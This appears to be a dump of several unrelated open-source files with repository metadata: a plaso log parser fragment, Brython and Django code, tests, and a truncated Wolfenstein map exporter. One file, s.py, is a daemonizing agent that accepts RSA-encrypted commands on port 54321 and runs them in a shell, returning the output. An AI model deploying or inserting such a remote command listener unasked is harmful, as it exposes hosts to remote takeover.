logging.debug(u'Invalid timestamp {0:s}'.format(structure.timestamp))
return
self._last_month = month
if key == 'logline':
self.previous_structure = structure
message = structure.message
else:
times = structure.times
structure = self.previous_structure
message = u'Repeated {0:d} times: {1:s}'.format(
times, structure.message)
    # It uses the CharsNotIn structure, which leaves whitespace
    # at the beginning of the sender and the caller.
sender = structure.sender.strip()
caller = structure.caller.strip()
if not caller:
caller = 'unknown'
if not structure.security_api:
security_api = u'unknown'
else:
security_api = structure.security_api
return MacSecuritydLogEvent(
timestamp, structure, sender, structure.sender_pid, security_api,
caller, message)
def _GetTimestamp(self, day, month, year, time):
"""Gets a timestamp from a pyparsing ParseResults timestamp.
This is a timestamp_string as returned by using
text_parser.PyparsingConstants structures:
08, Nov, [20, 36, 37]
Args:
day: An integer representing the day.
month: An integer representing the month.
year: An integer representing the year.
time: A list containing the hours, minutes, seconds.
Returns:
timestamp: A plaso timestamp.
"""
hours, minutes, seconds = time
return timelib.Timestamp.FromTimeParts(
year, month, day, hours, minutes, seconds)
def _GetYear(self, stat, zone):
"""Retrieves the year either from the input file or from the settings."""
time = getattr(stat, 'crtime', 0)
if not time:
time = getattr(stat, 'ctime', 0)
if not time:
current_year = timelib.GetCurrentYear()
logging.error((
u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
try:
timestamp = datetime.datetime.fromtimestamp(time, zone)
except ValueError:
current_year = timelib.GetCurrentYear()
logging.error((
u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
return timestamp.year
manager.ParsersManager.RegisterParser(MacSecuritydLogParser)
| apache-2.0 | 7,085,151,202,668,476,000 | 33.300725 | 80 | 0.680046 | false |
selboo/starl-mangle | Agent/Server/s.py | 1 | 4397 | #!/usr/bin/env python
#_*_encoding:utf-8_*_
# encoding:utf-8
import socket, os, subprocess, sys
import time,select,threading
import rsa,base64
import l_command
PRIVATE = os.getcwd()+"/private.pem"
def exchengx_text(text):
Result_Text = []
for i in range(len(text)):
Result_Text.append(''.join(text[i]))
Result_Text = ''.join(Result_Text)
return Result_Text
def key():
return 'Selboo'
def decryption(crypto):
with open(PRIVATE) as privatefile:
p = privatefile.read()
privkey = rsa.PrivateKey.load_pkcs1(p)
try:
message = rsa.decrypt(crypto, privkey)
except rsa.pkcs1.DecryptionError, e:
message = False
print 'ID-002 DecryptionError...:%s' % e
return message
def tcpsocket():
try:
name = 'selboo'
listen_ip = '0.0.0.0'
socket_port = '54321'
buffer_size = '1024'
listen_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_tcp.bind((listen_ip, int(socket_port)))
listen_tcp.setblocking(0)
listen_tcp.listen(100)
except socket.error, e:
print 'ID-001 Create Socket Error...:%s' % e
os._exit(0)
def tcp_send(connection, content):
tcp_limit = 100
tcp_length = len(content)
tcp_subcon = tcp_length / tcp_limit
tcp_tail = tcp_length % tcp_limit
tcp_start = 0
tcp_stop = tcp_limit
tcp_head = str(tcp_length)+','+str(tcp_subcon)+'|'+name
tcp_head = tcp_head.ljust(tcp_limit)
connection.send(tcp_head)
if tcp_length <= tcp_limit:
connection.send(content[tcp_start:tcp_length])
return 0
alist = []
for i in range(0,tcp_subcon):
tcp_d = content[tcp_start:tcp_stop]
connection.send(tcp_d)
time.sleep(0.0001)
tcp_start = tcp_stop
tcp_stop = tcp_stop + tcp_limit
tcp_t = content[tcp_start:tcp_length]
connection.send(tcp_t)
return 0
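    # Hedged protocol note (inferred from tcp_send above, not from any spec):
    # every reply is framed by a fixed 100-byte ASCII header of the form
    # "<total_length>,<full_chunks>|<name>" padded with spaces, followed by
    # the payload in 100-byte chunks. E.g. a 250-byte result is sent as
    # "250,2|selboo" plus padding, then chunks of 100, 100 and 50 bytes.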
def command(tag, connection, reault):
if tag == 1:
Reault_exchangx = exchengx_text(reault)
#connection.send(base64.encodestring(Reault_exchangx))
#print Reault_exchangx
tcp_send(connection, Reault_exchangx)
return 0
else:
tcp_send(connection, reault)
return 0
return 1
def tcmd(Test, listen_tcp):
connection,address = listen_tcp.accept()
buf_src = connection.recv(int(buffer_size))
if decryption(buf_src):
buf = decryption(buf_src)
else:
buf_src = 'Decryption failed '+buf_src
connection.send(buf_src)
return 0
if buf == 'l_restart':
reload(l_command)
command(2, connection, str('Restart...'))
return 0
cmd = l_command.l_main(buf)
if cmd:
command(2, connection, str(cmd))
return 0
if len(buf) != 0:
p = subprocess.Popen(str(buf), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Result_out = p.stdout.readlines()
if Result_out:
command(1, connection, Result_out)
Result_err = p.stderr.readlines()
if Result_err:
command(1, connection, Result_err)
connection.close()
return 0
while True:
infds,outfds,errfds = select.select([listen_tcp,],[],[],5)
if len(infds) != 0:
ting = threading.Thread(target=tcmd, args=('Test', listen_tcp))
ting.start()
def createDaemon():
try:
if os.fork() > 0:
os._exit(0)
except OSError, error:
print 'fork #1 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
#print 'Daemon PID %d' % pid
os._exit(0)
except OSError, error:
print 'fork #2 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
#conn.send(os.getpid())
#conn.close()
funzioneDemo()
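# Hedged note (standard UNIX double-fork daemonization, inferred from the
# code above): the first fork lets the original parent exit so the child is
# adopted by init; setsid() detaches it from the controlling terminal; the
# second fork guarantees the survivor can never reacquire one. Only the
# grandchild reaches funzioneDemo().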
def funzioneDemo():
tcpsocket()
if __name__ == '__main__':
createDaemon()
| apache-2.0 | -6,994,118,043,903,329,000 | 27.006369 | 125 | 0.549011 | false |
wiredrive/wtframework | generate_examples.py | 1 | 2872 | ##########################################################################
# This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from __future__ import print_function
import os
from six import u
# This file takes the files in the /tests directory, then converts them
# into strings in wtframework/wtf/_devtools_/filetemplates/examples.py
# These are the files that are generated when the user does --withexamples
# in the project generator
if __name__ == '__main__':
example_path = os.path.join('wtframework', 'wtf', '_devtools_', 'filetemplates', '_examples_.py')
print(example_path)
examples_file = open(example_path,
"w")
examples_file.write(u("""##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from six import u
examples = {}
"""))
for root, dirs, files in os.walk('tests'):
for example_file in files:
if not example_file.endswith(".py"):
continue
fpath = os.path.join(root, example_file)
print("processing ", fpath)
the_file = open(fpath)
examples_file.write(u("examples['" + fpath + "'] = u('''"))
examples_file.write(u(the_file.read().replace("'''", '"""')))
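            # Hedged note (my reading of the line above): each file is being
            # embedded in a u('''...''') literal, so any ''' inside it would
            # terminate the string early; rewriting ''' as """ keeps the
            # generated _examples_.py parseable.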
examples_file.write(u("\n''')\n\n"))
examples_file.close()
| gpl-3.0 | -365,536,399,557,576,400 | 38.888889 | 103 | 0.587396 | false |
2014c2g5/2014cadp | wsgi/local_data/brython_programs/fourbar1.py | 1 | 1463 | # need yen_fourbar.js
from javascript import JSConstructor
import math
from browser import doc
import browser.timer
# convert Javascript function object into Brython object
point = JSConstructor(Point)
line = JSConstructor(Line)
link = JSConstructor(Link)
triangle = JSConstructor(Triangle)
def draw():
global theta
# clear canvas context
ctx.clearRect(0, 0, canvas.width, canvas.height)
# draw linkeage
line1.drawMe(ctx)
line2.drawMe(ctx)
line3.drawMe(ctx)
# draw triangles
#triangle1.drawMe(ctx)
#triangle2.drawMe(ctx)
# input link rotation increment
theta += dx
# calculate new p2 position according to new theta angle
p2.x = p1.x + line1.length*math.cos(theta*degree)
p2.y = p1.y - line1.length*math.sin(theta*degree)
temp = triangle2.setPPSS(p2, p4, link3_len, link2_len)
p3.x = temp[0]
p3.y = temp[1]
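# Hedged kinematics note (my reading of draw() above, not the author's
# documentation): p2 is driven on a circle of radius |p1p2| about the fixed
# pivot p1 via p2 = p1 + L1*(cos(theta), -sin(theta)), and p3 is recovered as
# the intersection of circles of radius link2_len about p2 and link3_len
# about p4, which Triangle.setPPSS() solves from two points and two sides.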
x, y, r = 10, 10, 10
# define canvas and context
canvas = doc["plotarea"]
ctx = canvas.getContext("2d")
# fourbar linkage inputs
theta = 0
degree = math.pi/180
dx = 2
dy = 4
p1 = point(150, 100)
p2 = point(150, 200)
p3 = point(300, 300)
p4 = point(350, 100)
line1 = link(p1, p2)
line2 = link(p2, p3)
line3 = link(p3, p4)
line4 = link(p1, p4)
line5 = link(p2, p4)
link2_len = p2.distance(p3)
link3_len = p3.distance(p4)
triangle1 = triangle(p1,p2,p4)
triangle2 = triangle(p2,p3,p4)
temp = []
ctx.translate(0, canvas.height)
ctx.scale(1, -1)
browser.timer.set_interval(draw, 10)
| gpl-3.0 | -3,730,226,384,178,324,500 | 23.813559 | 60 | 0.688312 | false |
wheelcms/wheelcms_users | wheelcms_users/tests/test_userconfig.py | 1 | 3520 | import pytest
import json
from wheelcms_axle.configuration import ConfigurationHandler
from wheelcms_users.models import ConfigurationHandler as UserConfigurationHandler
from django.contrib.auth.models import User
import mock
from twotest.fixtures import client, django_client
@pytest.fixture
def handler():
patch_processors = mock.patch(
'django.template.context.get_standard_processors',
return_value=())
patch_processors.start()
try:
return ConfigurationHandler(request=mock.Mock())
finally:
patch_processors.stop()
class TestUserConfig(object):
def test_nousers(self, handler):
""" No users """
userconf = UserConfigurationHandler()
instance = mock.Mock()
with mock.patch("django.contrib.auth.models.User.objects.all",
return_value=[]):
data = json.loads(userconf.user_data(handler, instance).content)
assert data['existing'] == []
def test_user(self, handler):
""" Single user with some role """
userconf = UserConfigurationHandler()
instance = mock.Mock()
with mock.patch("django.contrib.auth.models.User.objects.all",
return_value=[
mock.Mock(id=1,
username="u", first_name="f",
last_name="l", email="e",
is_active=True, is_superuser=False,
roles=mock.Mock(**{"all.return_value":[
mock.Mock(**{"role.id":123})
]
}
))
]):
data = json.loads(userconf.user_data(handler, instance).content)
assert len(data['existing']) == 1
user = data['existing'][0]
assert user['id'] == 1
assert user['username'] == 'u'
assert user['firstname'] == 'f'
assert user['lastname'] == 'l'
assert user['email'] == 'e'
assert user['active']
assert not user['superuser']
assert user['roles'] == {'123':True}
def test_save_user(self, handler, client):
""" Adding a new user """
userconf = UserConfigurationHandler()
instance = mock.Mock()
handler.request = mock.Mock(**{"method":"POST",
"POST.get.return_value":
json.dumps({ 'existing':[
dict(state="added",
id='added_1',
username="new",
firstname="first",
lastname="last",
email="[email protected]")
]})
}
)
data = json.loads(userconf.user_data(handler, instance).content)
user = User.objects.filter(username="new")
assert user.count() == 1
assert user[0].first_name == "first"
assert user[0].last_name == "last"
assert user[0].email == "[email protected]"
| bsd-2-clause | -53,175,416,013,545,170 | 37.26087 | 82 | 0.451136 | false |
hydroshare/django_docker_processes | migrations/0001_initial.py | 1 | 9489 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import jsonfield.fields
import django_docker_processes.models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ContainerOverrides',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=256)),
('command', models.TextField(null=True, blank=True)),
('working_dir', models.CharField(max_length=65536, null=True, blank=True)),
('user', models.CharField(max_length=65536, null=True, blank=True)),
('entrypoint', models.CharField(max_length=65536, null=True, blank=True)),
('privileged', models.BooleanField(default=False)),
('lxc_conf', models.CharField(max_length=65536, null=True, blank=True)),
('memory_limit', models.IntegerField(default=0, help_text=b'megabytes')),
('cpu_shares', models.IntegerField(help_text=b'CPU Shares', null=True, blank=True)),
('dns', jsonfield.fields.JSONField(help_text=b'JSON list of alternate DNS servers', null=True, blank=True)),
('net', models.CharField(blank=True, max_length=8, null=True, help_text=b'Network settings - leave blank for default behavior', choices=[(b'bridge', b'bridge'), (b'none', b'none'), (b'host', b'host')])),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('docker_overrides', models.ForeignKey(blank=True, to='django_docker_processes.ContainerOverrides', help_text=b'Overrides for the container to run', null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerPort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProcess',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('container_id', models.CharField(max_length=128, null=True, blank=True)),
('token', models.CharField(default=django_docker_processes.models.docker_process_token, unique=True, max_length=128, db_index=True)),
('logs', models.TextField(null=True, blank=True)),
('finished', models.BooleanField(default=False)),
('error', models.BooleanField(default=False)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=1024, db_index=True)),
('git_repository', models.CharField(max_length=16384)),
('git_use_submodules', models.BooleanField(default=False)),
('git_username', models.CharField(max_length=256, null=True, blank=True)),
('git_password', models.CharField(max_length=64, null=True, blank=True)),
('commit_id', models.CharField(max_length=64, null=True, blank=True)),
('branch', models.CharField(default=b'master', max_length=1024, null=True, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536, null=True, blank=True)),
('container', models.CharField(max_length=65536)),
('readonly', models.BooleanField(default=False)),
('docker_profile', models.ForeignKey(to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
('docker_profile_from', models.ForeignKey(help_text=b'This container must be started and running for the target to run', to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverridePort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='dockerprocess',
name='profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerprocess',
name='user',
field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),
preserve_default=True,
),
migrations.AddField(
model_name='dockerport',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile',
field=models.ForeignKey(help_text=b'This is the "target" container. It will receive information about\nthe "from" container as an environment var', to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile_from',
field=models.ForeignKey(related_name='profile_link_to', to='django_docker_processes.DockerProfile', help_text=b'This container must be started and running for the target to run'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerenvvar',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='containeroverrides',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
]
| bsd-3-clause | 3,178,048,872,036,171,000 | 45.743842 | 219 | 0.562125 | false |
TexZK/pywolf | bin/export_ql_pk3.py | 1 | 62849 | # TODO: create Exporter class(es)
# TODO: break export loops into single item calls with wrapping loop
# TODO: allow export to normal file, PK3 being an option (like with open(file_object|path))
import argparse
import collections
import io
import logging
import os
import sys
import zipfile
from PIL import Image
import numpy as np
from pywolf.audio import samples_upsample, wave_write, convert_imf_to_wave, convert_wave_to_ogg
import pywolf.game
from pywolf.graphics import write_targa_bgrx, build_color_image
import pywolf.persistence
from pywolf.utils import find_partition, load_as_module
OBJECT_LIGHT_MAP = { # name: (normalized_height, amount, color)
'ceiling_light': (0.8, 100, (1.0, 1.0, 0.9)),
'chandelier': (0.8, 200, (1.0, 1.0, 0.8)),
'lamp': (0.6, 100, (1.0, 1.0, 0.9)),
'chalice': (0.2, 30, (1.0, 1.0, 0.8)),
'cross': (0.2, 30, (1.0, 1.0, 0.8)),
'crown': (0.2, 30, (1.0, 1.0, 0.8)),
'jewels': (0.2, 30, (1.0, 1.0, 0.8)),
'extra_life': (0.3, 30, (0.8, 0.8, 1.0)),
'gold_key': (0.2, 30, (1.0, 1.0, 0.8)),
'medkit': (0.2, 30, (1.0, 1.0, 1.0)),
'silver_key': (0.2, 30, (0.8, 1.0, 1.0)),
}
COLLECTABLE_ENTITY_MAP = { # (name, wait)
'ammo': ('ammo_pack', 10),
'ammo_used': ('ammo_pack', 10),
'chaingun': ('weapon_chaingun', 5),
'chalice': ('item_armor_shard', 25),
'cross': ('item_armor_shard', 25),
'crown': ('item_armor_shard', 25),
'dog_food': ('item_health_small', 35),
'extra_life': ('item_health_mega', 35),
'food': ('item_health', 35),
'gold_key': ('item_haste', 120),
'jewels': ('item_armor_shard', 25),
'machinegun': ('weapon_hmg', 5),
'medkit': ('item_health_large', 35),
'silver_key': ('item_quad', 120),
}
IMF2WAV_PATH = os.path.join('..', 'tools', 'imf2wav')
OGGENC2_PATH = os.path.join('..', 'tools', 'oggenc2')
TEXTURE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
{{
map {1!s}
rgbGen identityLighting
}}
}}
'''
SPRITE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
deformVertexes autoSprite2
surfaceparm trans
surfaceparm nonsolid
cull none
{{
clampmap {1!s}
alphaFunc GT0
rgbGen identityLighting
}}
}}
'''
NORTH = 0
EAST = 1
SOUTH = 2
WEST = 3
TOP = 4
BOTTOM = 5
DIR_TO_DISPL = [
( 0, -1, 0),
( 1, 0, 0),
( 0, 1, 0),
(-1, 0, 0),
( 0, 0, 1),
( 0, 0, -1),
]
DIR_TO_YAW = [
90,
0,
270,
180,
0,
0,
]
ENEMY_INDEX_TO_DIR = [
EAST,
NORTH,
WEST,
SOUTH,
]
TURN_TO_YAW = [
0,
45,
90,
135,
180,
225,
270,
315,
]
TURN_TO_DISPL = [
( 1, 0),
( 1, -1),
( 0, -1),
( -1, -1),
( -1, 0),
( -1, 1),
( 0, 1),
( 1, 1),
]
def _force_unlink(*paths):
    # Delete the given files, skipping None placeholders and missing files.
    for path in paths:
        if not path:
            continue
        try:
            os.unlink(path)
        except OSError:
            pass
def build_cuboid_vertices(extreme_a, extreme_b):
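    """Build the six quadrilateral faces of the axis-aligned cuboid spanned
    by the opposite corners ``extreme_a`` and ``extreme_b``.

    Faces are returned in NORTH, EAST, SOUTH, WEST, TOP, BOTTOM order
    (matching the ``DIR_*`` constants), each as a list of four vertices::

        >>> build_cuboid_vertices((0, 0, 0), (1, 1, 1))[TOP]
        [(0, 1, 1), (1, 1, 1), (1, 0, 1), (0, 0, 1)]
    """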
xa, ya, za = extreme_a
xb, yb, zb = extreme_b
return [[(xb, yb, zb), (xa, yb, zb), (xa, yb, za), (xb, yb, za)],
[(xb, ya, zb), (xb, yb, zb), (xb, yb, za), (xb, ya, za)],
[(xa, ya, zb), (xb, ya, zb), (xb, ya, za), (xa, ya, za)],
[(xa, yb, zb), (xa, ya, zb), (xa, ya, za), (xa, yb, za)],
[(xa, yb, zb), (xb, yb, zb), (xb, ya, zb), (xa, ya, zb)],
[(xb, yb, za), (xa, yb, za), (xa, ya, za), (xb, ya, za)]]
def describe_cuboid_brush(face_vertices, face_shaders, shader_scales, format_line=None,
flip_directions=(NORTH, WEST), content_flags=None, surface_flags=None):
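    """Return the lines of a Q3Map2 brush block (``{`` ... ``}``), one plane
    per face; each plane is defined by the first three vertices of the face
    and textured with the matching shader. The horizontal texture scale is
    mirrored for the directions listed in ``flip_directions``.
    """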
if format_line is None:
format_line = ('( {0[0]:.0f} {0[1]:.0f} {0[2]:.0f} ) '
'( {1[0]:.0f} {1[1]:.0f} {1[2]:.0f} ) '
'( {2[0]:.0f} {2[1]:.0f} {2[2]:.0f} ) '
'"{3!s}" 0 0 0 {4:f} {5:f} {6:d} {7:d} 0')
if content_flags is None:
content_flags = (0, 0, 0, 0, 0, 0)
if surface_flags is None:
surface_flags = (0, 0, 0, 0, 0, 0)
lines = ['{']
arrays = zip(range(len(face_vertices)), face_shaders, face_vertices, surface_flags, content_flags)
for direction, shader_name, vertices, surface_flags, content_flags in arrays:
scale_u = shader_scales[0]
scale_v = shader_scales[1]
if direction in flip_directions:
scale_u = -scale_u
line = format_line.format(vertices[0], vertices[1], vertices[2],
shader_name, scale_u, scale_v,
content_flags, surface_flags) # TODO: make as arrays?
lines.append(line)
lines.append('}')
return lines
class MapExporter(object): # TODO
def __init__(self, params, cfg, tilemap, episode_index, submap_index):
self.params = params
self.cfg = cfg
self.tilemap = tilemap
self.episode_index = episode_index
self.submap_index = submap_index
episode = cfg.EPISODES[episode_index]
self.tilemap_index = episode[0] + submap_index
dimensions = tilemap.dimensions
half_units = params.tile_units / 2
self.unit_offsets = ((-half_units * dimensions[0]), (half_units * dimensions[1]), 0)
self.tile_partition_cache = {}
self.entity_partition_cache = {}
def tile_to_unit_coords(self, tile_coords):
tile_units = self.params.tile_units
return [
(tile_coords[0] * tile_units),
(tile_coords[1] * -tile_units),
]
def center_units(self, tile_coords, unit_offsets=(0, 0, 0), center_z=False):
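        """Return the world-unit coordinates of the center of the given
        tile, shifted by ``unit_offsets`` and raised to half tile height
        when ``center_z`` is set."""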
units = self.tile_to_unit_coords(tile_coords)
half = self.params.tile_units / 2
return [(unit_offsets[0] + units[0] + half),
(unit_offsets[1] + units[1] + half),
(unit_offsets[2] + (half if center_z else 0))]
def describe_textured_cube(self, tile_coords, face_shaders, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - half), (center_z - half))
extreme_b = ((center_x + half), (center_y + half), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_textured_sprite(self, tile_coords, face_shader, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - 1), (center_z - half - 1))
extreme_b = ((center_x + half), (center_y + 0), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
face_shaders = [
face_shader,
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
]
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_area_brushes(self, tile_coords): # TODO: support for all floor/ceiling modes of ChaosEdit
params = self.params
cfg = self.cfg
tilemap_index = self.tilemap_index
tile_units = params.tile_units
format_palette_texture = '{}_palette/color_0x{:02x}'.format
lines = []
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.CEILING_COLORS[tilemap_index]),
]
offsets = list(self.unit_offsets)
offsets[2] += tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.FLOOR_COLORS[tilemap_index]),
'common/caulk',
]
offsets = list(self.unit_offsets)
offsets[2] -= tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
return lines
def describe_wall_brush(self, tile_coords):
params = self.params
cfg = self.cfg
tilemap = self.tilemap
x, y = tile_coords
tile = tilemap[x, y]
partition_map = cfg.TILE_PARTITION_MAP
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
face_shaders = []
for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
facing_coords = ((x + displacement[0]), (y + displacement[1]))
facing = tilemap.get(facing_coords)
if facing is None:
shader = 'common/caulk'
else:
if facing[1] == pushwall_entity:
facing_partition = 'floor'
else:
facing_partition = find_partition(facing[0], partition_map, count_sign=1,
cache=self.tile_partition_cache)
if facing_partition == 'wall':
shader = 'common/caulk'
else:
if facing_partition == 'floor':
texture = tile[0] - partition_map['wall'][0]
elif facing_partition in ('door', 'door_elevator', 'door_silver', 'door_gold'):
texture = partition_map['door_hinge'][0] - partition_map['wall'][0]
else:
raise ValueError((tile_coords, facing_partition))
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
if any(shader != 'common/caulk' for shader in face_shaders):
return self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
else:
return ()
def describe_sprite(self, tile_coords):
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
name = cfg.ENTITY_OBJECT_MAP[entity]
lines = []
if name in cfg.SOLID_OBJECT_NAMES:
face_shaders = ['common/clip'] * 6
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets))
face_shader = '{}_static/{}'.format(params.short_name, name)
lines.extend(self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets))
return lines
def describe_collectable(self, tile_coords): # TODO
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
name = cfg.ENTITY_OBJECT_MAP[entity]
give_name, give_wait = COLLECTABLE_ENTITY_MAP[name]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'adlib/{}'.format(cfg.COLLECTABLE_PICKUP_SOUNDS[name])),
'}',
]
underworld_z = center_z + params.underworld_offset
give_entity = [
'{',
'classname target_give',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}',
]
target_entity = [
'{',
'classname {}'.format(give_name),
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}'
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
'}',
]
speaker_close_entity = [ # TODO
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
